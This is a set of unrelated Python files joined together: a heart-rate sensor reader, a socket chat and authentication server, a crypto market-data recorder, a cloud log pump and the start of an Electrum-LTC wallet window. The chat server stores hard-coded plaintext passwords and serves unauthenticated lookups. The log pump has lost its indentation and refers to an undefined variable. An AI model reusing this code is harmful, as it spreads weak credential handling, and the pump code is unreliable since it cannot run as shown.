            if N > 250:  # avoid high-frequency noise
                if Signal > thresh and not Pulse and N > (IBI / 5.0) * 3:
                    Pulse = True
                    IBI = sampleCounter - lastBeatTime
                    lastBeatTime = sampleCounter

                    if secondBeat:
                        secondBeat = False
                        # Seed the running total for a realistic startup BPM.
                        for i in range(len(rate)):
                            rate[i] = IBI
                    if firstBeat:
                        firstBeat = False
                        secondBeat = True
                        # The very first IBI is unreliable; skip it.
                        continue

                    # Keep a running average of the last 10 IBI values.
                    rate[:-1] = rate[1:]
                    rate[-1] = IBI
                    runningTotal = sum(rate) / len(rate)
                    self.BPM = 60000 / runningTotal

            if Signal < thresh and Pulse:
                # Values are going down again: the beat is over.
                Pulse = False
                amp = P - T
                thresh = amp / 2 + T     # re-center threshold at 50% of amplitude
                P = thresh
                T = thresh

            if N > 2500:
                # 2.5 seconds without a beat: reset everything to defaults.
                thresh = 512
                P = 512
                T = 512
                lastBeatTime = sampleCounter
                firstBeat = True
                secondBeat = False
                self.BPM = 0

            time.sleep(0.005)

    def startAsyncBPM(self):
        """Start the background thread that keeps ``self.BPM`` updated."""
        self.thread = threading.Thread(target=self.getBPMLoop)
        self.thread.stopped = False
        self.thread.start()

    def stopAsyncBPM(self):
        """Stop the background thread (if any) and reset the BPM reading."""
        if self.thread is not None:
            self.thread.stopped = True
            self.thread.join()   # wait for a clean shutdown of the sampler
            self.thread = None
        self.BPM = 0
# Sample the sensor in the background and report the BPM once per second.
p = Pulsesensor()
p.startAsyncBPM()

try:
    while True:
        bpm = p.BPM
        if bpm > 0:
            print("BPM: %d" % bpm)
        else:
            print("No Heartbeat found")
        time.sleep(1)
except KeyboardInterrupt:
    # Ctrl-C is the normal way to exit; any other exception should
    # propagate (the original bare `except:` hid real errors).
    pass
finally:
    p.stopAsyncBPM()
|
server.py | import socket
import threading
from _thread import start_new_thread
# Hard-coded credential store: username -> password.
# NOTE(review): plaintext passwords — acceptable for a demo only.
username_password_db = {'srinag': 'password', 'shreyas': 'password', 'skitty': 'password', 'yash': '149',
'sanjay': '136'}
# username -> IP address it last authenticated from.
username_resolver = {}
# IP address -> username (inverse of username_resolver).
ip_resolver = {}
# username -> connection socket (not used in this module's visible code).
username_conn = {}
call_service_port = 8001  # TCP port of the call/auth control service
msg_service_port = 8002  # TCP port of the chat message service
run = True  # global run flag; cleared to stop the server loops
call_processor_sock = None  # listening socket created by call_processor()
def auth(username, password):
    """Return True when `username` exists and `password` matches it."""
    expected = username_password_db.get(username)
    return expected is not None and expected == password
# Per-connection receive buffers: bytes read past a newline are kept here
# for the next read_sock() call on the same connection.  The original code
# used a single module-wide buffer, which mixed data between concurrent
# connections served by different threads.
_recv_buffers = {}


def read_sock(conn):
    """Read one newline-terminated message from `conn`, decoded and stripped.

    Blocks until a full line is available.  Bytes received after the newline
    are buffered per connection for the next call.  If the peer closes the
    connection before a newline arrives, whatever was received is returned
    (the original implementation busy-looped forever in that case).
    """
    data = _recv_buffers.pop(conn, b'')
    while b'\n' not in data:
        block = conn.recv(10)
        if not block:
            # Peer closed the connection before a complete line arrived.
            return data.decode().strip()
        data += block
    line, _, rest = data.partition(b'\n')
    if rest:
        _recv_buffers[conn] = rest
    return line.decode().strip()
def call_processor():
    """Accept control connections and serve auth / name-resolution requests.

    Protocol: one newline-terminated, colon-separated command per connection:

    - ``auth:<user>:<pass>``   register caller's IP; reply 'pass' or 'fail'
    - ``unauth:<user>:<pass>`` drop the caller's registration (no reply)
    - ``unr:<user>``           resolve username -> IP ('-1' when unknown)
    - ``ipr:<ip>``             resolve IP -> username ('-1' when unknown)
    """
    global run, call_processor_sock
    call_processor_sock = socket.socket()
    call_processor_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    call_processor_sock.bind(('', call_service_port))
    call_processor_sock.listen(5)
    while run:
        conn, address = call_processor_sock.accept()
        if not run:
            # A dummy "wake-up" connection made during shutdown.
            break
        print('Got connection from', address)
        request = read_sock(conn)
        print(request)
        parts = request.split(':')
        command = parts[0]
        if command == 'auth':
            if auth(parts[1], parts[2]):
                username_resolver[parts[1]] = address[0]
                ip_resolver[address[0]] = parts[1]
                conn.send(b'pass\n')
            else:
                conn.send(b'fail\n')
        elif command == 'unauth':
            if auth(parts[1], parts[2]):
                username_resolver.pop(parts[1], None)
                ip_resolver.pop(address[0], None)
        elif command == 'unr':
            # NOTE(review): resolution requests are not authenticated.
            ip = username_resolver.get(parts[1], '-1')
            conn.send((':'.join(['unr', parts[1], ip]) + '\n').encode('ascii'))
        elif command == 'ipr':
            username = ip_resolver.get(parts[1], '-1')
            conn.send((':'.join(['ipr', parts[1], username]) + '\n').encode('ascii'))
        conn.close()
    call_processor_sock.close()
# Registered chat clients, as [username, conn] pairs.
list_of_clients = []


def client_thread(conn, addr):
    """Serve one chat client: authenticate, then relay messages until exit.

    :param conn: connected socket for this client
    :param addr: (ip, port) tuple of the peer
    """
    global run
    username = read_sock(conn)
    password = read_sock(conn)
    print("Client entered:" + username, password)
    if not auth(username, password):
        msg = 'Invalid Authentication! Connect Again!\n'
        print(msg)
        conn.send(msg.encode())
        conn.close()
        return
    entry = [username, conn]
    list_of_clients.append(entry)
    print("Client has authenticated on address", addr[0])
    conn.send("Welcome to this chatroom!".encode())
    while run:
        try:
            message = conn.recv(2048).decode()
        except (OSError, UnicodeDecodeError):
            # Socket failed: drop the client instead of spinning forever
            # (the original bare `except: continue` busy-looped here).
            break
        if not message:
            # An empty read means the peer disconnected.
            break
        print(message)
        if message[:3] == 'pm ':
            user = message[3:].split()
            message_to_send = 'pm ' + username + ' ' + ' '.join(user[1:]) + '\n'
            user = user[0]
            if not pm(message_to_send, user):
                conn.send("Client not Found!\n".encode())
        else:
            broadcast('bc ' + username + ' ' + ' '.join(message.split()[1:]), conn)
    remove(entry)
    conn.close()
# Placeholder kept for interface compatibility (not used in this module).
client_threads = {}


def msg_listener():
    """Accept chat clients on msg_service_port, one handler thread each."""
    global run
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(('', msg_service_port))
    listener.listen(100)
    while run:
        conn, addr = listener.accept()
        if not run:
            # A dummy "wake-up" connection made during shutdown.
            break
        print(addr[0] + " connected")
        start_new_thread(client_thread, (conn, addr))
def remove(connection):
    """Remove a client from list_of_clients.

    Callers in this file pass either a whole ``[username, conn]`` entry
    or a bare socket; the original membership test only ever matched the
    pair form, so removals of bare sockets silently failed.
    """
    for entry in list(list_of_clients):  # copy: we mutate while scanning
        if entry is connection or entry[1] is connection:
            list_of_clients.remove(entry)
def broadcast(message, connection):
    """Send `message` to every connected client except `connection`.

    Clients whose sockets fail are closed and removed without stopping
    delivery to the remaining clients (the original `break` aborted the
    whole broadcast after the first failure, and it removed entries from
    the list it was iterating).
    """
    for entry in list(list_of_clients):  # copy: remove() mutates the list
        if entry[1] != connection:
            try:
                entry[1].send(message.encode())
            except OSError:
                entry[1].close()
                remove(entry)
def pm(msg, to):
    """Send a private message to the user named `to`.

    :return: True when the message was delivered, False otherwise
        (unknown recipient, or recipient socket failed).
    """
    names = [entry[0] for entry in list_of_clients]
    if to not in names:
        return False
    tosock = list_of_clients[names.index(to)][1]
    try:
        tosock.send(msg.encode())
        print("Sent!")
        return True
    except OSError:
        # Recipient socket is dead: drop it and report the failure
        # explicitly (the original fell through and returned None).
        tosock.close()
        remove(tosock)
        return False
def main():
    """Start both service threads and block until Ctrl-C, then shut down."""
    global run, call_processor_sock
    call_thread = threading.Thread(target=call_processor)
    call_thread.start()
    msg_thread = threading.Thread(target=msg_listener)
    msg_thread.start()
    try:
        call_thread.join()
        msg_thread.join()
    except KeyboardInterrupt:
        print('Stopping...')
        run = False
        # Each listener is blocked in accept(); poke it with a dummy
        # connection so it notices `run` is now False and exits.
        poke = socket.socket()
        poke.connect(('', call_service_port))
        poke.close()
        call_thread.join()
        poke = socket.socket()
        poke.connect(('', msg_service_port))
        poke.close()
        msg_thread.join()
        print('Stopped')


if __name__ == '__main__':
    main()
|
runCTADataRecording.py | # encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def runChildProcess():
    """Child process entry point: run the market-data recorder."""
    print('-' * 20)

    # Set up console logging first.
    engine_log = LogEngine()
    engine_log.setLogLevel(engine_log.LEVEL_INFO)
    engine_log.addConsoleHandler()
    engine_log.info('启动行情记录运行子进程')

    # Wire the event engine, the main engine, the gateway and the recorder.
    event_engine = EventEngine2()
    engine_log.info('事件引擎创建成功')
    main_engine = MainEngine(event_engine)
    main_engine.addGateway(okexGateway)
    main_engine.addApp(dataRecorder)
    engine_log.info('主引擎创建成功')

    # Route log events to the console handler.
    event_engine.register(EVENT_LOG, engine_log.processLogEvent)
    engine_log.info('注册日志事件监听')

    main_engine.connect('OKEX')
    engine_log.info('连接OKEX接口')

    # Keep the process alive; the engines run on their own threads.
    while True:
        sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
    """Guardian (parent) process: (re)starts the recording child process.

    The trading-session windows below are kept for reference but the check
    that used them is disabled: OKEX is a crypto exchange and trades around
    the clock, so `recording` is always True.
    """
    # Create the log engine.
    le = LogEngine()
    le.setLogLevel(le.LEVEL_INFO)
    le.addConsoleHandler()
    le.info('启动行情记录守护父进程')

    DAY_START = time(8, 59)     # day session window 1
    DAY_END = time(10, 16)
    DAY_START2 = time(10, 29)   # day session window 2
    DAY_END2 = time(11, 31)
    DAY_START3 = time(13, 29)   # day session window 3
    DAY_END3 = time(15, 1)      # was the obscure octal literal 0o1 (== 1)
    NIGHT_START = time(20, 59)  # night session window
    NIGHT_END = time(23, 31)

    p = None                    # child process handle
    while True:
        currentTime = datetime.now().time()
        recording = True        # always record: crypto markets never close
        # Original session-window / weekend check, intentionally disabled:
        # if ((currentTime >= DAY_START and currentTime <= DAY_END) or
        #     (currentTime >= DAY_START2 and currentTime <= DAY_END2) or
        #     (currentTime >= DAY_START3 and currentTime <= DAY_END3) or
        #     (currentTime >= NIGHT_START and currentTime <= NIGHT_END)):
        #     recording = True
        # if datetime.today().weekday() in (5, 6):
        #     recording = False

        # Within recording hours: make sure the child process is running.
        if recording and p is None:
            le.info('启动子进程')
            p = multiprocessing.Process(target=runChildProcess)
            p.start()
            le.info('子进程启动成功')

        # Outside recording hours: stop the child process.
        if not recording and p is not None:
            le.info('关闭子进程')
            p.terminate()
            p.join()
            p = None
            le.info('子进程关闭成功')

        sleep(5)
# Launch the guardian process when executed as a script.
if __name__ == '__main__':
    runParentProcess()
pump.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import colorlog
from datetime import date, datetime, timedelta
import logging
from multiprocessing import Process, Queue
import os
import re
import requests
from six import string_types
import socket
import string
import sys
import time
import xmltodict
import config
from endpoint import Endpoint
__version__ = '17.4.30'
class Pump(object):
"""
Pumps logs from the Managed Cloud Platform (MCP) of Dimension Data
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
"""
def __init__(self, settings={}):
"""
Ignites the plumbing engine
:param settings: the parameters for this pump instance
:type settings: ``dict``
:param parameters: the external parameters
:type plan: ``str`` or ``file`` or ``dict``
"""
self.settings = settings
if self.settings.get('debug', False):
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
else:
logging.basicConfig(format='%(message)s', level=logging.INFO)
self._userName = None
self._userPassword = None
self.engines = {}
self.dqueues = []
self.mqueues = []
self.updaters = []
self.context = {}
def get_user_name(self):
"""
Retrieves user name to authenticate to the API
:return: the user name to be used with the driver
:rtype: ``str``
:raises: :class:`Exception`
- if no user name can be found
The user name is normally taken
from the environment variable ``MCP_USER``.
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
In addition, you can put the value in the configuration file,
like this::
mcp:
MCP_USER: 'foo.bar'
"""
if self._userName is None:
self._userName = self.settings.get('MCP_USER')
if self._userName is None:
self._userName = os.getenv('MCP_USER')
if self._userName is None or len(self._userName) < 3:
raise Exception(
"Missing credentials in environment MCP_USER")
return self._userName
def get_user_password(self):
"""
Retrieves user password to authenticate to the API
:return: the user password to be used with the driver
:rtype: ``str``
:raises: :class:`plumbery.Exception`
- if no user password can be found
The user password is normally
taken from the environment variable ``MCP_PASSWORD``.
Under Linux, you may want to edit ``~/.bash_profile`` like this::
# credentials to access cloud resources from Dimension Data
export MCP_USER='foo.bar'
export MCP_PASSWORD='WhatsUpDoc'
In addition, you can put the value in the configuration file,
like this::
mcp:
MCP_PASSWORD: 'WhatsUpDoc'
"""
if self._userPassword is None:
self._userPassword = self.settings.get('MCP_PASSWORD')
if self._userPassword is None:
self._userPassword = os.getenv('MCP_PASSWORD')
if self._userPassword is None or len(self._userPassword) < 3:
raise Exception(
"Missing credentials in environment MCP_PASSWORD")
return self._userPassword
def get_regions(self):
"""
Retrieves regions to be analysed
:return: the list of regions
:rtype: ``list`` of ``str``
Regions should normally be listed in main configuration::
mcp:
regions: ['dd-af', 'dd-ap', 'dd-au', 'dd-eu', 'dd-na']
"""
return self.settings.get('regions',
('dd-af', 'dd-ap', 'dd-au', 'dd-eu', 'dd-na'))
def set_endpoints(self):
"""
Sets API endpoints
This function initializes one endpoint per region.
"""
self.engines = {}
for region in self.get_regions():
self.engines[region] = Endpoint(
key=self.get_user_name(),
secret=self.get_user_password(),
region=region)
def set_workers(self):
"""
Sets processing workers
This function creates 2 queues per region, one for the processing
of daily data, and another one for the processing of real-time data.
"""
self.dqueues = []
self.mqueues = []
for region in self.get_regions():
self.context[ region ] = {}
q = Queue()
w = Process(target=self.work_every_day, args=(q, region))
w.daemon = True
w.start()
self.dqueues.append(q)
q = Queue()
w = Process(target=self.work_every_minute, args=(q, region))
w.daemon = True
w.start()
self.mqueues.append(q)
def get_date(self, horizon='90d', since=None):
"""
Computes target date
:param horizon: amount of time in the past, e.g., '90d', '3m', '1y'
:type horizon: ``str`` or `None`
:param since: staring date for computation
:type since: ``date`` or `None`
:return: the related date, e.g., date(2016, 11, 30)
:rtype: ``date``
"""
if since is None:
since = date.today()
if horizon.endswith('y'):
years = int(horizon.strip('y'))
target = date(since.year - years, 1, 1)
elif horizon.endswith('m'):
months = int(horizon.strip('m'))
year = since.year - int(months/12)
month = since.month - months%12
while month < 1:
year -= 1
month += 12
target = date(year, month, 1)
elif horizon.endswith('d'):
days = int(horizon.strip('d'))
target = (since - timedelta(days=days))
else:
raise ValueError('Incorrect horizon value')
return target
def pump(self, since=None, forever=True):
"""
Pumps data continuously
:param since: the beginning date, e.g., date(2016, 09, 01)
:type since: ``date`` or `None`
:param forever: loop until Ctrl-C or not
:type forever: `True` or `False`
"""
head = since if since else date.today()
tail = date.today()
while head < tail:
logging.info("Pumping data for {}".format(head))
for queue in self.dqueues:
queue.put(head)
head += timedelta(days=1)
while forever:
if head < tail:
logging.info("Pumping data for {}".format(head))
for queue in self.dqueues:
queue.put(head)
head += timedelta(days=1)
else:
logging.info("Pumping data for one minute")
for queue in self.mqueues:
queue.put(head)
time.sleep(60)
tail = date.today()
def work_every_day(self, queue, region):
"""
Handles data for one day and for one region
:param queue: the list of days to consider
:type queue: `Queue`
:param region: the region to consider
:type region: `str`
This is ran as an independant process, so it works asynchronously
from the rest.
"""
try:
for cursor in iter(queue.get, 'STOP'):
self.pull(cursor, region)
time.sleep(0.5)
except KeyboardInterrupt:
pass
except:
raise
def work_every_minute(self, queue, region):
"""
Handles data for one minute and for one region
:param queue: the minute ticks for a given day
:type queue: `Queue`
:param region: the region to consider
:type region: `str`
This is ran as an independant process, so it works asynchronously
from the rest.
"""
try:
for cursor in iter(queue.get, 'STOP'):
self.tick(cursor, region)
time.sleep(0.5)
except KeyboardInterrupt:
pass
except:
raise
def pull(self, on, region='dd-eu'):
"""
Pulls data for a given region on a given date
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
try:
items = self.fetch_summary_usage(on, region)
self.update_summary_usage(items, region)
items = self.fetch_detailed_usage(on, region)
self.update_detailed_usage(items, region)
items = self.fetch_audit_log(on, region)
self.update_audit_log(items, region)
except socket.error as feedback:
logging.warning('Cannot access API endpoint for {}'.format(region))
logging.warning('- {}'.format(str(feedback)))
except Exception as feedback:
logging.error('Unable to pull for {}'.format(region))
logging.exception(feedback)
def tick(self, on, region='dd-eu'):
"""
Detects active servers over the past minute for a given region
:param on: the current day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
try:
today = (on + timedelta(days=1))
raw = self.fetch_audit_log(today, region)
items = self.tail_audit_log(today, raw, region)
servers = self.list_active_servers(items, region)
self.on_servers(servers, region)
except socket.error as feedback:
logging.warning('Cannot access API endpoint for {}'.format(region))
logging.warning('- {}'.format(str(feedback)))
except Exception as feedback:
logging.error('Unable to tick for {}'.format(region))
logging.exception(feedback)
def fetch_summary_usage(self, on, region='dd-eu'):
"""
Fetches and returns summary usage
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching summary usage for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].summary_usage_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
items.pop(-1)
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def fetch_detailed_usage(self, on, region='dd-eu'):
"""
Fetches and returns detailed usage
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching detailed usage for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].detailed_usage_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
items.pop(-1)
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def fetch_audit_log(self, on, region='dd-eu'):
"""
Fetches and returns audit log records
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
logging.info("Fetching audit log for {} on {}".format(
region, on.strftime("%Y-%m-%d")))
start_date = (on - timedelta(days=1)).strftime("%Y-%m-%d")
end_date = on.strftime("%Y-%m-%d")
items = self.engines[region].audit_log_report(
start_date,
end_date)
if len(items) > 0:
first = ','.join(items[0])
if len(first) < 1 or first.startswith(('<!DOCTYPE', '<?xml')):
logging.debug('Data could not be fetched')
logging.debug(items)
items = []
logging.warning("- no item could be found for {} on {}".format(
region, end_date))
else:
logging.debug("- found {} items for {} on {}".format(
len(items), region, end_date))
return items
def tail_audit_log(self, on, raw=[], region='dd-eu'):
"""
Considers only new records from the audit log
:param on: the target day, e.g., date(2016, 11, 30)
:type on: ``date``
:param raw: raw records from the audit log
:type raw: `list` of `list`
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
if raw in ([], None): # sanity check
return []
cursor = self.context[region].get('cursor')
uid = self.context[region].get('uid')
raw.pop(0) # remove headers
if cursor == on and uid is not None:
index = 0
while index < len(raw):
if raw[index][0] == uid:
break
index += 1
if index > 0 and index < len(raw):
del raw[:index+1]
elif len(raw) > 0 and raw[0][0] == uid:
del raw[0]
if len(raw) > 0:
self.context[region]['cursor'] = on
self.context[region]['uid'] = raw[-1][0]
logging.debug("- tail to {} for {}".format(raw[-1][0], region))
logging.debug("- {} new items have been found".format(len(raw)))
else:
logging.debug("- nothing new at {}".format(region))
return raw
def list_active_servers(self, raw=[], region='dd-eu'):
"""
Detects active servers from the audit log
:param raw: raw records from the audit log
:type raw: `list` of `dict`
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
servers = []
name_and_id = r'(.*)\[(.*)_(.*)\]'
nodes = {}
# process every record from the audit log
#
for item in raw:
# we are interested only into completed actions on servers
#
if item[6] != 'SERVER':
continue
# we are not interested into OEC_SYSTEM
#
if item[2] == 'OEC_SYSTEM':
continue
# we are looking for new servers and for restarted servers
#
if item[8].lower() not in ('deploy server',
'start server',
'graceful shutdown server',
'power off server',
'reboot server'):
continue
# extract name and unique id of the server
#
matches = re.match(name_and_id, item[7])
name = matches.group(1)
id = matches.group(3)
# catch any real-time problem
#
try:
# retrieve node information
#
node = self.engines[region].get_node_by_id(id=id)
if node is None:
continue
# build a record for the updaters
#
server = node.copy()
server['stamp'] = item[1]
actor = string.replace(item[2], '.', ' ')
actor = string.replace(actor, '_', '-')
server['actor'] = actor.title()
server['action'] = item[8]
server['region'] = region
# extend the raw list of activated servers
#
servers.append(server)
# recover safely from any error
#
except Exception as feedback:
logging.debug('Cannot locate {}'.format(name))
logging.exception(feedback)
nodes[id] = None
# list of server updates
#
if len(servers) > 0:
logging.debug('Found server updates for {}'.format(region))
return servers
def add_updater(self, updater):
"""
Adds a new database updater
:param updater: check directory `updaters`
:type updater: ``object``
"""
self.updaters.append(updater)
def open_updaters(self, horizon):
"""
Signals the beginning of the job to updaters
"""
for updater in self.updaters:
try:
if horizon:
updater.reset_store()
else:
updater.use_store()
except Exception as feedback:
logging.error('- unable to open updater')
logging.debug(feedback)
def close_updaters(self):
"""
Signals the end of the job to updaters
"""
for updater in self.updaters:
try:
updater.close_store()
except Exception as feedback:
logging.error('- unable to close updater')
logging.debug(feedback)
def update_summary_usage(self, items, region='dd-eu'):
"""
Saves records of summary usage
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_summary_usage(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def update_detailed_usage(self, items, region='dd-eu'):
"""
Saves records of detailed usage
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_detailed_usage(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def update_audit_log(self, items, region='dd-eu'):
"""
Saves records of audit log
:param items: to be recorded in database
:type items: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.update_audit_log(list(items), region)
except IndexError:
logging.error('Invalid index in provided data')
logging.error(items)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
def on_servers(self, updates, region='dd-eu'):
"""
Sends updates related to servers
:param updates: to be recorded in database
:type updates: ``list`` of ``dict``
:param region: the target region, e.g., 'dd-eu'
:type region: ``str``
"""
avoided = 0
for updater in self.updaters:
if not updater.get('active', False):
avoided += 1
continue
try:
updater.on_servers(list(updates), region)
except Exception as feedback:
logging.warning('Unable to update on active servers')
logging.exception(feedback)
if avoided == len(self.updaters) and len(items) > 0:
logging.warning('No updater has been activated')
# when the program is launched from the command line
#
if __name__ == "__main__":

    # create the pump itself, configured from config.py when available
    #
    try:
        settings = config.pump
    except:
        settings = {}
    pump = Pump(settings)

    # colorized logging to the console
    #
    handler = colorlog.StreamHandler()
    handler.setFormatter(colorlog.ColoredFormatter(
        "%(asctime)-2s %(log_color)s%(message)s",
        datefmt='%H:%M:%S',
        reset=True,
        log_colors={
            'DEBUG': 'cyan',
            'INFO': 'green',
            'WARNING': 'yellow',
            'ERROR': 'red',
            'CRITICAL': 'red,bg_white',
        },
        secondary_log_colors={},
        style='%'
    ))
    root_logger = logging.getLogger('')
    root_logger.handlers = []
    root_logger.addHandler(handler)

    # parse the optional <horizon> argument
    #
    horizon = None
    if len(sys.argv) > 1:
        horizon = sys.argv[1]
        if horizon[-1] not in ('d', 'm', 'y'):
            print('usage: pump [<horizon>]')
            print('examples:')
            print('pump')
            print('pump 90d')
            print('pump 3m')
            print('pump 12m')
            print('pump 1y')
            sys.exit(1)
        horizon = pump.get_date(horizon)
        logging.info('Pumping since {}'.format(horizon))

    # log data in files as per configuration
    #
    try:
        settings = config.files
        from models.files import FilesUpdater
        updater = FilesUpdater(settings)
        if updater.get('active', False):
            logging.info("Storing data in files")
            pump.add_updater(updater)
        else:
            logging.debug("The files module has not been activated")
    except AttributeError:
        logging.debug("No configuration for file storage")

    # add an elasticsearch updater as per configuration
    #
    try:
        settings = config.elastic
        from models.elastic import ElasticUpdater
        updater = ElasticUpdater(settings)
        if updater.get('active', False):
            logging.info("Storing data in Elasticsearch")
            pump.add_updater(updater)
        else:
            logging.debug("The Elasticsearch module has not been activated")
    except AttributeError:
        logging.debug("No configuration for Elasticsearch")

    # add an influxdb updater as per configuration
    #
    try:
        settings = config.influxdb
        from models.influx import InfluxdbUpdater
        updater = InfluxdbUpdater(settings)
        if updater.get('active', False):
            logging.info("Storing data in InfluxDB")
            pump.add_updater(updater)
        else:
            logging.debug("The InfluxDB module has not been activated")
    except AttributeError:
        logging.debug("No configuration for InfluxDB")

    # add a qualys updater as per configuration
    #
    try:
        settings = config.qualys
        from models.qualys import QualysUpdater
        updater = QualysUpdater(settings)
        if updater.get('active', False):
            logging.info("Using Qualys service")
            pump.add_updater(updater)
        else:
            logging.debug("The Qualys module has not been activated")
    except AttributeError:
        logging.debug("No configuration for Qualys")

    # add a Cisco Spark room as per configuration
    #
    try:
        settings = config.spark
        from models.spark import SparkUpdater
        updater = SparkUpdater(settings)
        if updater.get('active', False):
            logging.info("Using Cisco Spark service")
            pump.add_updater(updater)
        else:
            logging.debug("The Cisco Spark module has not been activated")
    except AttributeError:
        logging.debug("No configuration for Cisco Spark")

    # sanity check
    #
    if len(pump.updaters) < 1:
        logging.warning('No updater has been activated, check config.py')

    # fetch and dispatch data until Ctrl-C
    #
    pump.open_updaters(horizon)
    try:
        pump.set_endpoints()
        pump.set_workers()
        pump.pump(since=horizon)
    except KeyboardInterrupt:
        pass
    finally:
        pump.close_updaters()
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_ltc as electrum
from electrum_ltc import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_ltc.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_ltc.plugin import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
